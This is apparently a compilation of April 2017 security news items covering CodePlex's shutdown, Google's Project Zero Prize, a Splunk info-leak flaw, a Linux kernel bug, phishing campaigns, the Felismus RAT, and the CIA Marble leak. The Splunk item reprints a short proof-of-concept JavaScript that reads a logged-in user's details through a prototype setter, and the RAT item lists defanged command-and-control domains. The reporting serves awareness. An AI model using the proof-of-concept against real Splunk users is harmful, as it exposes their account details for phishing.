"You will also be able to download an archive file with your project contents, all in common, transferable formats like Markdown and JSON," Harry writes.
"Where possible, we will put in place redirects so that existing URLs work, or at least redirect you to the project's new homepage on the archive. And, the archive will respect your "I've moved" setting, if you used it, to direct users to the current home of your project."
Migrate your Code and Related Projects to GitHub
Harry also points out that many of Microsoft's open source software projects have already found their way to GitHub and the company is actively recommending people to do so.
The company is itself using GitHub to host open-source software projects such as PowerShell, .NET and its Chakra JavaScript engine.
Microsoft is making the process of migration easier for its users. Microsoft has teamed up with GitHub to create a "streamlined" migration tool to help developers shift their code and related content over to GitHub.
Since a release date of the migration tool is not yet known, users can check out the guide on CodePlex for any help with migrating to GitHub.


No Prizes Awarded in Google's Android Hacking Contest

3.4.2017 thehackernews Android

Google reported last week that its Project Zero Prize contest was not as successful as the company hoped it would be – no valid Android exploits were submitted and no prizes were awarded.

In September, Google announced the start of a six-month Android hacking contest that invited researchers to submit serious vulnerabilities and exploit chains. The first winning entry was offered $200,000, and the second would have received $100,000. Other entries were promised at least $50,000.

While some research teams and individuals informed the company of their intention to take part in the contest, ultimately, no one submitted any valid bugs, said Google Project Zero’s Natalie Silvanovich. Some vulnerability reports were submitted, but they were not eligible for a reward under the rules of the Project Zero Prize.

Google believes three main factors led to the lack of entries. One of them was the level of difficulty – hackers were required to find a full exploit chain that allowed remote code execution on up-to-date Nexus 6P and Nexus 5X devices by knowing only their email address and phone number. The targeted user could only open an email in Gmail or an SMS in Messenger.

Project Zero Prize participants were encouraged to submit partial exploits during the contest as the rules only allowed the first submitter to use a certain vulnerability during the contest.

“We expected these rules to encourage participants to file any bugs they found immediately, as only the first finder could use a specific bug, and multiple reports of the same Android bug are fairly common,” Silvanovich explained. “Instead, some participants chose to save their bugs for other contests that had lower prize amounts but allowed user interaction, and accept the risk that someone else might report them in the meantime.”

The tech giant also believes the prizes offered in the contest may have been too small for the types of vulnerabilities that were required. For example, zero-day acquisition firm Zerodium also offers up to $200,000 for Android rooting exploits and they can fetch much more on the black market.

While this contest was not a success, researchers do find plenty of vulnerabilities in Android. Google revealed recently that it paid out roughly $1 million for Android flaws reported last year through its vulnerability reward program.


Attackers can siphon data from Splunk Enterprise if an authenticated user visits a malicious webpage
3.4.2017 thehackernews Vulnerebility

Splunk has fixed the security issue in the JavaScript implementation, tracked as CVE-2017-5607, that can be exploited to siphon data.
Splunk has fixed the security issue in the JavaScript implementation, tracked as CVE-2017-5607, that leaks user information. Splunk provides the leading platform for Operational Intelligence that is used to search, monitor, analyze and visualize machine data. Splunk Enterprise, collects and analyzes high volumes of machine-generated data.

Splunk

The security issue could be exploited by an attacker tricking an authenticated user into visiting a malicious Web page. The bug leaks the username, and whether that user has enabled remote access, allowing an attacker to target the user with a spear phishing attack to steal the user’s credentials.

“Attackers can siphon information from Splunk Enterprise if an authenticated Splunk user visits a malicious webpage. Some useful data gained is the currently logged in username and if remote user setting is enabled.” reads the advisory published at Full Disclosure. “After, the username can be use to Phish or Brute Force Splunk Enterprise login. Additional information stolen may aid in furthering attacks.

Root cause is the global Window JS variable assignment of config?autoload=1 ‘$C’.”

The problem resides in the way Splunk uses Object prototypes in JavaScript. The Object prototype is an Object that every other object inherits from in JavaScript.

“To steal information we simply can define a function to be called when the ‘$C’ JS property is “set” on webpage, for example. Object.defineProperty( Object.prototype, “$C”, { set:function(val){…” continues the advisory,

Below the proof-of-concept JavaScript code published in the advisory:

<script>
Object.defineProperty( Object.prototype, “$C”, { set:function(val){
//prompt(“Splunk Timed out:\nPlease Login to Splunk\nUsername:
“+val.USERNAME, “Password”)
for(var i in val){
alert(“”+i+” “+val[i]);
}
}
});
</script>

Affected Splunk Enterprise versions are:

6.5.x before 6.5.3
6.4.x before 6.4.6
6.3.x before 6.3.10
6.2.x before 6.2.13.1
6.1.x before 6.1.13
6.0.x before 6.0.14
5.0.x before 5.0.18 and Splunk Light before 6.5.2


Linux Kernel vulnerability CVE-2017-7184 disclosed at Pwn2Own 2017 fixed
3.4.2017 securityaffairs Vulnerebility

The Linux kernel flaw exploited by the hackers at the Zero Day Initiative’s Pwn2Own 2017 competition to hack Ubuntu has been patched.
The Chaitin Security Research Lab (@ChaitinTech) discovered a Linux Kernel flaw, , tracked as CVE-2017-7184, during the last Pwn2Own 2017 competition. The experts hacked Ubuntu Desktop exploiting a Linux kernel heap out-of-bound access and earned $15,000 and 3 Master of Pwn points. It was the first time for an Ubuntu Linux hack at the Pwn2Own.

“This vulnerability allows local attackers to execute arbitrary code on vulnerable installations of the Linux Kernel. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.” reads the ZDI advisory.

“The specific flaw exists within the handling of xfrm states. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to elevate privileges and execute arbitrary code under the context of the kernel.”

Linux Kernel Flaw CVE-2017-7184 Pwn2Own 2017

The vulnerability can be exploited to cause a denial-of-service (DoS) condition or to execute arbitrary code. It could be exploited by a local attacker to escalate privileges on the system.

Red Hat rated the flaw as “high severity,” anyway its experts confirmed that the flaw cannot be exploited for privilege escalation on default or common configurations of Red Hat Enterprise Linux 5, 6 and 7.

The CVE-2017-718 flaw was quickly fixed in the Linux kernel a few days after the Pwn2Own 2017 competition, and Ubuntu development team has fixed it at the end of March. Other Linux distributions are already working on security patches.


Phishing campaigns target airline consumers seeking business credentials
3.4.2017 securityaffairs Phishing

A series of phishing campaigns is targeting airline consumers with messages crafted to trick victims into handing over personal or business credentials.
A wave string of phishing campaigns is targeting airline consumers with messages crafted to trick victims into handing over personal or business credentials.

The phishing messages pretend to be sent from a travel agency or a someone inside the target firm, they include a weaponized document or embed a malicious link.

“Over the past several weeks, we have seen a combination of attack techniques. One, where an attacker impersonates a travel agency or someone inside a company. Recipients are told an email contains an airline ticket or e-ticket,” explained Asaf Cidon, vice president, content security services at Barracuda Networks.


According to Barracuda Networks, aviation-themed phishing attacks contain links to spoofed airline sites, threat actors personalize the phishing page in a way to trick victims into providing business information.

The attackers show a deep knowledge of the targets, hackers are targeting logistic, manufacturing and shipping industries.

“It’s clear there is some degree of advanced reconnaissance that takes place before targeting individuals within these companies,” Cidon added.

Recently the U.S. Computer Emergency Readiness Team issued an alert of phishing campaigns targeting airline consumers.

“US-CERT has received reports of email-based phishing campaigns targeting airline consumers. Systems infected through phishing campaigns act as an entry point for attackers to gain access to sensitive business or personal information.” reads the US-CERT warning.

“US-CERT encourages users and administrators to review an airline Security Advisory(link is external) and US-CERT’s Security Tip ST04-014 for more information on phishing attacks.”

The US-CERT specifically references the security advisory published by Delta Air Lines that warned its consumers of fraudulent activities.

“Delta has received reports of attempts by parties not affiliated with us to fraudulently gather customer information in a number of ways including: fraudulent emails, social media sites, postcards, Gift Card promotional websites claiming to be from Delta Air Lines and letters or prize notifications promising free travel,” states the Delta Air Lines warning.

Barracuda confirmed that these campaigns have a high success rate:

“Our analysis shows that for the airline phishing attack, attackers are successful over 90 percent of the time in getting employees to open airline impersonation emails,” concluded Cidon. “This is one of the highest success rates for phishing attacks.”


Forcepoint spotted the modular Felismus RAT, it appears the work of skilled professionals
2.4.2017 securityaffairs Virus

Malware researchers at Forcepoint have discovered a new modular malicious code, dubbed Felismus RAT, that appears the work of skilled professionals.
Malware researchers at Forcepoint have discovered a new modular malicious code dubbed Felismus RAT. The malware has been used in highly targeted campaigns, experts believe the Felismus RAT is the work of skilled professionals.

The malware implements sophisticated evasion technique and anti-analysis features (i.e. Advanced encryption of network communications, the malware uses at least three separate encryption methods depending on the type of message), Forcepoint experts noticed a good ‘operational hygiene’ of the threat actor, it avoided re-use of email addresses and other traceable artifacts for its campaigns.

The Felismus RAT implements a self-updating capability, it is currently able to evade a large number of antivirus solutions. The malicious code implements the typical features of RATs, such as file upload, file download, file execution, and shell (cmd.exe) command execution.

The malicious code can also create text files on the infected machine.

The researchers started the investigation on the Felismus RAT working on available samples feature filenames mimicking that of Adobe’s Content Management System (AdobeCMS.exe). These samples were detected several weeks ago, but the cyber attacks leveraging this malware can be dated six months before.

“The primary samples examined appear in the wild with filenames mimicking that of Adobe’s Content Management System [1] and offers a range of commands typical of Remote Access Tools: file upload, file download, file execution, and command execution.” reads the analysis published by Forcepoint. “Analysis shows the malware overall to be modular, well-written, and to go to great lengths to hinder both analysis efforts and the content of its communications. Its apparent scarcity in the wild implies that it is likely highly targeted. Furthermore, as discussed in this analysis, the good ‘operational hygiene’ relating to the re-use of email addresses and other similarly traceable artefacts similarly suggests the work of coordinated professionals.”

The experts are still investigating the attacks leveraging the RAT that is believed to be part of a larger campaign.

The command and control (C&C) infrastructure appears still active.

“Visiting cosecman[]com reveals what appears to be a copy of the WordPress.org website, albeit with a stylesheet error in all browsers tested.” continues the analysis.

Felismus RAT

The researchers noticed the threat actors did not reuse the email addresses to register the domains involved in their campaigns.

“The malware analysed appears to be both modular and well-written, strongly suggesting that skilled attackers are responsible, while its apparent scarcity in the wild implies that it is likely highly targeted.”concluded the analysis. “On top of this, the good ‘operational hygiene’ relating to the re-use of email addresses and other similarly traceable artefacts suggests coordinated, professional actors and, at the time of writing, there is little to link it with any known campaigns (APT-linked or otherwise),”

Some typo errors in the folder name and in the function name ‘GetCurrtenUserName’ suggest that the authors might not be Anglo-Saxons.

The researchers discovered that the available malware samples appear to have been compiled using a December 2014 version of the open-source TDM-GCC compiler suite.

The researchers added that one of the C&C IP addresses appeared to selectively block one of the security firm’s exit IPs during research.

“If the other modules and capabilities associated with the malware remain a matter of speculation, so too do the intended target(s). Of the five domains hosted on the C&C IP address identified within this post, three – cosecman[]com, nasomember[]com, and unmailhome[]com – have potential associations with the financial services sector; however, under this theory the naming of the remaining two domains – maibars[]com and mastalib[]com – remain unexplained,” Forcepoint concludes.


95,000 job seekers affected by the McDonald’s Canada data breach
2.4.2017 securityaffairs Crime

The McDonald’s Canada career website was recently subject to a cyber-attack. Hackers stole records of 95,000 job seekers.
McDonald’s Canada confirmed that hackers have stolen the personal data of about 95,000 job seekers from its recruitment website.

The data were provided by candidates searching for a job at McDonald’s Canada since March 2014. The company has launched an investigation into the data breach that exposed job candidates’ names, addresses, emails, telephone numbers, employment histories and other personal data.

“The McDonald’s Canada (“McDonald’s”) career website (http://www.mcdonalds.ca/ca/en/careers.html or http://www.mcdonalds.ca/ca/fr/careers.html) was recently subject to a cyber-attack.” reads the data breach notification published by the company.

“As a result, the personal information of approximately 95,000 restaurant job applicants has been compromised. Applicants affected are those who applied online for a job at a McDonald’s Canada restaurant between March 2014 and March 2017. “

McDonald's Canada

McDonald’s Canada has shut down the recruitment website, fortunately the company doesn’t request sensitive data such as health information, social insurance numbers and financial information.

The company confirmed that it is not aware of any abuse of the stolen data.

“The careers webpage will remain shut down until the investigation is complete and appropriate measures are taken to ensure that this type of security breach does not happen again,” continues the breach notification.


Over 85% Of Smart TVs Can Be Hacked Remotely Using Broadcasting Signals
2.4.2017 thehackernews IoT

The Internet-connected devices are growing at an exponential rate, and so are threats to them.
Due to the insecure implementation, a majority of Internet-connected embedded devices, including Smart TVs, Refrigerators, Microwaves, Security Cameras, and printers, are routinely being hacked and used as weapons in cyber attacks.
We have seen IoT botnets like Mirai – possibly the biggest IoT-based malware threat that emerged late last year and caused vast internet outage by launching massive DDoS attacks against DynDNS provider – which proves how easy it is to hack these connected devices.
Now, a security researcher is warning of another IoT threat involving Smart TVs that could allow hackers to take complete control of a wide range of Smart TVs at once without having any physical access to any of them.
Researcher Shows Live Hacking Demonstration

The proof-of-concept exploit for the attack, developed by Rafael Scheel of cyber security firm Oneconsult, uses a low-cost transmitter for embedding malicious commands into a rogue DVB-T (Digital Video Broadcasting — Terrestrial) signals.
Those rogue signals are then broadcast to nearby devices, allowing attackers to gain root access on the Smart TVs, and using those devices for nasty actions, such as launching DDoS attacks and spying on end users.
Scheel provided a live hacking demonstration of the attack during a presentation at the European Broadcasting Union (EBU) Media Cyber Security Seminar, saying about 90 percent of the Smart TVs sold in the last years are potential victims of similar attacks.
Scheel's exploit relies on a transmitter based on DVB-T — a transmission standard that's built into TVs that are connected to the Internet.
The attack exploits two known privilege escalation vulnerabilities in the web browsers running in the background and once compromised, attackers could remotely connect to the TV over the Internet using interfaces, allowing them to take complete control of the device.
Once compromised, the TV would be infected in a way that neither device reboots nor factory resets would help the victims get rid of the infection.

Scheel's exploit is unique and much more dangerous than any smart TV hack we have seen so far.
Previous Smart TV hacks, including Weeping Angel (described in the CIA leaked documents), required physical access to the targeted device or relied on social engineering, which exposes hackers to the risk of being caught as well as limits the number of devices that can be hacked.
However, Scheel's exploit eliminates the need for hackers to gain physical control of the device and can work against a vast majority of TV sets at once.
The hack once again underlines the risks of "Internet of Things" devices. Since the IoT devices are rapidly growing and changing the way we use technology, it drastically expands the attack surface, and when viewed from the vantage point of information security, IoT can be frightening.


German Military to Launch the Bundeswehr’s new Cyber and Information Space Command
2.4.2017 securityaffairs  BigBrothers

Today the German Military is going to launch a cyber command, the Bundeswehr’s new Cyber and Information Space (CIR) Command.
Today the German Military is going to launch a cyber command, the Bundeswehr’s new Cyber and Information Space (CIR) Command, a structure that is considered strategic for the defence of the country from cyber attacks.

According to the new commander, Lieutenant General Ludwig Leinhos, Germany is taking a leading role among the members of the NATO alliance.

“Leinhos said the main tasks would be to operate and protect the military’s own IT infrastructure and computer-assisted weapons systems, as well as surveillance of online threats.” reported the Reuters agency.

The German Government intends to protect its critical infrastructure and its assets from cyber attacks. The German military fears cyber espionage and sabotage.

The Bundeswehr’s new Cyber and Information Space (CIR) Command, will be composed of 260 IT specialists, but the Government plans to increase its staff up to 13,500 military and civilian personnel by July.

The General Ludwig Leinhos confirmed that the centre will be tasked to develop offensive cyber capabilities.

“He said the centre would also develop and war-game offensive capabilities because “in order to be able to defend yourself, you have to know the options for attack”.” continues the Reuters.

The operations conducted by the Cyber and Information Space (CIR) Command would have to be approved by the German Parliament, this means that cyber operations are considered equal to conventional military missions.

The creation of the centre is the response to the numerous attacks suffered by the German Government, last year the Bundestag was hit by numerous attacks.


In June, German media reported that Bundestag may need to replace 20,000 computers after hackers breached the Bundestag systems.

According to the Der Spiegel magazine, security experts involved in the investigation on the attack against the Bundestag suspect that the hack was part of a large-scale espionage campaign conducted by Russians state-sponsored hackers.

The German defense ministry said that in the first nine weeks of 2017, the IT systems of the Bundeswehr had been hit by more than 280,000 attacks.

“we are in a constant race between the development of attack options and defensive capabilities” concluded Leinhos.


WikiLeaks Reveals the Marble framework, used by the CIA to make hard the attribution
2.4.2017 securityaffairs BigBrothers

WikiLeaks has published the third batch of documents dubbed Marble that revealed the CIA anti-forensics tool dubbed Marble framework.
WikiLeaks released the third batch of the CIA Vault7 archive that shed light the anti-forensics tools used by the intelligence Agency,

The first tranche of CIA documents from Vault7 was related to hacking tools and techniques, while the second batch included detailed info about hacking tools specifically designed to hack SmartTV, Android handhelds, Apple iPhones, Macs and Windows systems.

This third lot of documents, dubbed Mable, includes the source code files for the anti-forensic Marble Framework. It contains 676 source code files of a secret anti-forensic Marble Framework.

The experts from the CIA have developed the Marble Framework to make hard forensics activities on its malicious codes.

The code used by the CIA was able to evade detection implementing various techniques, for example, it is able to detect if the code runs in virtual machine sandbox.

The Marble platform makes hard the attribution of the attacks, the documents show how CIA can conduct a cyber attack in a way experts attributed it to other countries, including Russia, China, North Korea and Iran.

“Today, March 31st 2017, WikiLeaks releases Vault 7 “Marble” — 676 source code files for the CIA’s secret anti-forensic Marble Framework. Marble is used to hamper forensic investigators and anti-virus companies from attributing viruses, trojans and hacking attacks to the CIA.” reads Wikileaks.

“Marble does this by hiding (“obfuscating”) text fragments used in CIA malware from visual inspection. This is the digital equivallent of a specalized CIA tool to place covers over the english language text on U.S. produced weapons systems before giving them to insurgents secretly backed by the CIA.”

Marble framework wikileaks

The CIA Marble Framework platform includes algorithms to insert into the malware source code multiple strings in various languages to make hard the attribution. Using such kind of techniques malware authors try to trick victims into believing that the malware was developed by American/English Vxers.

“The source code shows that Marble has test examples not just in English but also in Chinese, Russian, Korean, Arabic and Farsi.” continues Wikileaks. “This would permit a forensic attribution double game, for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion, but there are other possibilities, such as hiding fake error messages.”

Marble Framework does not contain any vulnerabilities or exploits.

The Marble dump also includes a deobfuscator to reverse CIA text obfuscation, using it experts can identify patterns of attacks conducted by the CIA and attribute previous hacking attacks and malicious codes to the Agency. Marble was in use at the CIA during 2016, in 2015 the cyber spies were using the 1.0 version.


Threat Landscape for Industrial Automation Systems, H2 2016
1.4.2017 Kaspersky ICS

The Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT) is starting a series of regular publications about our research devoted to the threat landscape for industrial organizations.

All statistical data used in the report was obtained using Kaspersky Security Network (KSN), a distributed antivirus network. Data was received from those KSN users who consented to have their data collected anonymously.

The research carried out in the second half of 2016 by Kaspersky Lab ICS CERT experts clearly demonstrates a number of trends in the evolution of industrial enterprise security.

On average, in the second half of 2016 Kaspersky Lab products across the globe blocked attempted attacks on 39.2% of protected computers that Kaspersky Lab ICS CERT classifies as being part of industrial enterprise technology infrastructure.

This group includes computers that run Windows and perform one or more of the following functions:

Supervisory Control and Data Acquisition (SCADA) servers,
Data storage servers (Historian),
Data gateways (OPC),
Stationary engineer and operator workstations,
Mobile engineer and operator workstations,
Human Machine Interface (HMI).
The group also includes computers of external 3-d party contractors, SCADA vendors and system integrators as well as internal SCADA administrators.

Every month, an average of one industrial computer in five (20.1%) is attacked by malware. We have seen stable growth in the percentage of industrial computers attacked since the beginning of our observations, highlighting the importance of cybersecurity issues.

Threat Landscape for Industrial Automation Systems, H2 2016

Percentage of industrial computers attacked by month (second half of 2016)

Isolation of industrial networks can no longer be considered an effective protective measure. The proportion of malware infection attempts involving portable media, infection of backup copies, use of sophisticated schemes for transferring data from isolated networks in complex attacks – all of this demonstrates that risks cannot be avoided by simply disconnecting a system from the Internet.
Threat Landscape for Industrial Automation Systems, H2 2016

Sources of threats blocked on industrial computers (second half of 2016)

Remarkably, there is very little difference between the rankings of malware detected on industrial computers and those of malware detected on corporate computers. We believe that this demonstrates the absence of significant differences between computers on corporate networks and those on industrial networks in terms of the risk of chance infections. However, it is obvious that even a chance infection on an industrial network can lead to dangerous consequences.
Threat Landscape for Industrial Automation Systems, H2 2016

Distribution of industrial computers attacked by classes of malware used in attacks (second half of 2016)

According to our data, targeted attacks on companies in different industrial sectors are increasingly common. These are organized attacks that can target one enterprise, several enterprises, companies in one industrial sector or a broad range of industrial enterprises.

The Kaspersky Lab ICS CERT detected a series of phishing attacks which began no later than June 2016 and which are still active. The attacks target primarily industrial companies – metallurgical, electric power, construction, engineering and others. We estimate the number of companies attacked at over 500 in more than 50 countries around the world.

None of the malicious programs used in the attack – trojan spies and backdoors from different families, such as ZeuS, Pony/FareIT, Luminosity RAT, NetWire RAT, HawkEye, and ISR Stealer – are unique to this malicious campaign. They are all very popular among cybercriminals. However, these programs are packed with unique modifications of VB and MSIL packers that are used only in this attack. Our experience of investigating targeted attacks shows that cyberespionage is often used to prepare subsequent attack stages.

One quarter of all targeted attacks uncovered by Kaspersky Lab in 2016 targeted, among others, different industries – machine building, energy, chemical, transport and others.

In 2016, Kaspersky Lab evaluated the current state of IT security components in the industrial control systems of different vendors. As a result of this research, 75 vulnerabilities were identified in ICS components. 58 of them were marked as maximum critical vulnerabilities (CVSS v3.0 severity score 7.0 or higher).